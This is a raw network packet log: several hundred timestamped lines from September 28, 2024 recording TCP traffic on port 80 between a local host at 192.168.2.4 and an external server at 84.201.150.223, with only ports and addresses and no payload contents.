Sep 28, 2024 17:52:14.098248959 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.098258018 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.098273993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.098284006 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.098294973 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.100261927 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100277901 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100291967 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100307941 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100313902 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.100326061 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100342989 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100342035 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.100361109 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100368977 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.100390911 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.100390911 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.100394011 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100410938 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100416899 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.100428104 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.100438118 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.100455999 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.100476980 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101049900 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101064920 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101087093 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101099014 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101100922 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101111889 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101119041 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101125956 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101135015 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101151943 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101160049 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101160049 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101166964 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101171017 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101183891 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101192951 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101202965 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101202965 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101222992 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101243019 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101450920 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101466894 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101481915 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101492882 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101496935 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101505995 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101515055 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101526976 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101531029 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101538897 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101550102 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.101557016 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101571083 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.101593018 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104140997 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104165077 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104180098 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104195118 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104208946 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104211092 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104219913 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104224920 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104240894 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104242086 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104257107 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104266882 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104274035 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104284048 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104290009 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104302883 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104305983 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104315996 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104324102 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104336023 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104340076 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104347944 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104357958 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104367018 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104374886 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104377985 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104391098 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104399920 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104408026 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104410887 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104424000 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104429007 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104440928 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104448080 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104459047 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104465961 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104480982 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104485035 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104501963 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.104505062 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104518890 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.104540110 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105227947 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105242968 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105257034 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105273008 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105282068 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105283976 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105298996 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105302095 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105317116 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105321884 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105331898 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105341911 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105348110 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105354071 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105365038 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105365038 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105381966 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105391026 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105397940 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105401039 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105416059 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105421066 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105432987 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105436087 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105448008 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105456114 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105463982 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105474949 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105479956 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105488062 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105499029 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105500937 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105514050 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.105520010 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105536938 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.105551958 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106801033 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106817961 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106831074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106843948 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106842995 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106853962 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106862068 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106873035 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106878042 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106892109 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106894970 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106901884 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106911898 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106928110 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106929064 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106941938 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106945992 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106952906 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106965065 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.106967926 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.106981993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.107002020 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.137820005 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.137835979 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.137851954 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.137919903 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.137939930 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.138144016 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.138159990 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.138175964 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.138189077 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.138194084 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.138202906 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.138231993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.138247967 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.138818979 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.138869047 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.139403105 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.139419079 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.139434099 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.139446020 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.139451981 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.139457941 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.139468908 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.139477968 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.139486074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.139494896 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.139512062 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.139527082 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.147219896 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.147289038 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.147447109 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.147464037 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.147495985 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.147522926 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.147742987 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.147758961 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.147774935 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.147783995 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.147793055 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.147804976 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.147821903 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.147835970 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.148344040 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.148361921 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.148377895 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.148392916 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.148407936 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.148417950 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.148417950 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.148430109 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.148446083 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.148463011 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.148482084 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188246965 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188339949 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188431978 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188447952 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188483953 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188497066 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188713074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188729048 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188757896 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188775063 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188868999 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188890934 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188905001 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188911915 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188921928 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188922882 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188941002 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.188947916 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188956976 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.188981056 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.189549923 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.189565897 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.189588070 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.189603090 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.189610958 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.189610958 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.189631939 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.189646006 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.191417933 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.191469908 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.191509962 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.191524982 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.191550970 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.191566944 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.191611052 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.191627979 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.191643000 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.191654921 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.191659927 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.191668034 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.191684961 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.191698074 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.192251921 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.192296028 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.192675114 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.192717075 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.192809105 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.192826033 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.192851067 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.192867994 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.193042994 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193061113 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193075895 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193089962 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193090916 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.193101883 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.193105936 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193123102 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.193140984 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.193531990 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193547964 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193562984 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193578959 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193587065 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.193593979 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193605900 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.193610907 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.193636894 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.193650961 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.195219040 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.195271015 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.195380926 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.195404053 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.195430040 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.195447922 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.195601940 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.195617914 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.195643902 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.195660114 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.195847034 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.195862055 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.195878029 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.195892096 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.195893049 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.195903063 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.195921898 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.195936918 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196268082 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196284056 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196299076 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196310997 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196315050 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196322918 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196341038 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196358919 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196806908 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196821928 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196836948 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196851015 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196854115 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196866035 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196866989 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196876049 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196883917 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196893930 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196899891 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196908951 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196916103 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196928024 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196934938 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.196950912 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196974993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.196974993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.197734118 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.197756052 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.197772026 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.197781086 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.197788000 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.197793007 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.197804928 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.197815895 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.197823048 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.197828054 CEST	49730	80	192.168.2.4	84.201.150.223
